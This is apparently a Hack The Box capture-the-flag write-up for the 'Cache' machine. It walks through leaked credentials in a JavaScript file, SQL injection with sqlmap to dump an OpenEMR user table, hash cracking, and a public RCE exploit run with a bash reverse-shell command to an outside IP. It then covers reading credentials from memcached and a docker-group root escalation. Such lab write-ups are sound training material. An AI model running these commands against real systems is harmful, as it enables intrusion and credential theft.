Cache-HTB

Summary

Cache is the Hack The Box medium-level box. In the user part, we enumerated on port 80, the author’s page gave information of a new hostname that was running vulnerable OpenEMR. Username and password extracted using SQLMAP and a reverse shell were obtained as www-data after running. In the box, Memcache was running on port 11211 which had the password for the local user Luffy. Luffy was on the docker group which was exploited to get a root shell on the box.

FootHold

After the port scan, we discovered two open ports. Port 22 and port 80.

Note: Read the command and flags explanation

• sC: To scan with default Nmap scripts.
• sV (Version detection)
• oA: To write the output file in the three major formats at once.

#Command
$ nmap -sC -sV -oA nmap 10.10.10.188

We found a jquery directory in the go buster result. This directory reveals the password which we will use later.

#Command
$ http://cache.htb/query/functionality.js

http: //cache.htb/jquery/functionality.js

$(function(){
    
    var error_correctPassword = false;
    var error_username = false;
    
    function checkCorrectPassword(){
        var Password = $("#password").val();
        if(Password != 'H@v3_fun'){
            alert("Password didn't Match");
            error_correctPassword = true;
        }
    }
    function checkCorrectUsername(){
        var Username = $("#username").val();
        if(Username != "ash"){
            alert("Username didn't Match");
            error_username = true;
        }
    }
    $("#loginform").submit(function(event) {
        /* Act on the event */
        error_correctPassword = false;
         checkCorrectPassword();
         error_username = false;
         checkCorrectUsername();

        if(error_correctPassword == false && error_username ==false){
            return true;
        }
        else{
            return false;
        }
    });
    
});

We found the /author.html directory also in the Gobuster scan result. This page gave us New hostname hint i.e. HMS

We saved hms.htb in our /etc/hosts file and open hms.htb in the web browser.

Reference: Click here

According to the vulnerable OpenEMR. It says SQL Injection in add_edit_event_user.php SQL injection in add_edit_event_user.php is caused by unsanitized user input from the eid, userid, and PID parameters. Exploiting this vulnerability requires authentication to the Patient Portal; however, it can be exploited without authentication when combined with the Patient Portal authentication bypass mentioned above.

We tried the SQL injection command and got an error.

#Command
$hms.htb/portal/add_edit_event_user.php?pid='

We grab the request in the burp and saved them into a file. As you can see below our request is in the cache.req file.

SQLmap command gave us openemr database and we dump the table names of openemr database.

#Command
$sqlmap -r cache.req --threads=10 -D openemr --tables

Here we got the users_secure table name. Now we will dump data from this table name.

We again run our SQLmap command to dump the Users_secure table name.

#Command
$sqlmap -r cache.req — threads=10 -D openemr -T users_secure — dump

We successfully got a username and a hash password.

We cracked the hash using the john the ripper tool.

#Command
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash_password

After getting username:openemr_admin and password: xxxxx. We will log-in to the OpenEMR login portal.

We are in the administrator portal.

We found an exploit that is OpenEMR Remote Code Execution.

Reference: https://www.exploit-db.com/exploits/45161

We run the exploit according to the exploit usage command.

#Command
$ python 45161.py http://hms.htb/ -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.14.46/1337 0>&1'

Reference:

Offensive Security's Exploit Database Archive

We open the Netcat on port 1337 and got a reverse shell. We switch to the ash user using a password we already found on http: //cache.htb/jquery/functionality.js

Username: ash, Password: H@v3_fun

#Command
$ rlwrap nc -lvnp 1337
$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’

Privilege escalation via Docker

Running ss -nlt to List all Running Services, we found that the port 11211 is open and this port used for Memcached.

Ash does not have the privilege to logon as MySQL hence it is not possible to do any mysqldump, besides the database might not even have other passwords except for openemr.

The only suspicious port is TCP/11211 which after researched I found this site:

Penetration Testing on Memcached Server

telnet 127.0.0.1 11211
within the Memcache server, there is one slab active. stats slabs.

Enumerate the items stats items
The slab id is all 1.

Type in a command version to do a version scan of the Memcached Server.

We got a user name Luffy and a password 0n3_p1ec3.

#Command
$ version
$ get user
$ get user and get passwd

Reference:

memcached Cheat Sheet

An Introduction to the ss Command - Linux.com

We will ssh luffy@10.10.10.188 with the password 0n3_p1ec3

#Command
$ ssh luffy@cache.htb

Running ID command we notice that user Luffy is a member of the docker group. We need to get a valid docker image using the docker ps command

Reference:

docker ps

The Next Step is to Mount The Docker Valid Image Using Docker

docker run -v /:/mnt --rm -it 2ca708c1c9cc chroot /mnt sh

Reference:

docker | GTFOBins

Privilege escalation via Docker

Thanks for reading.

Hack The Box Profile: https://www.hackthebox.eu/profile/116842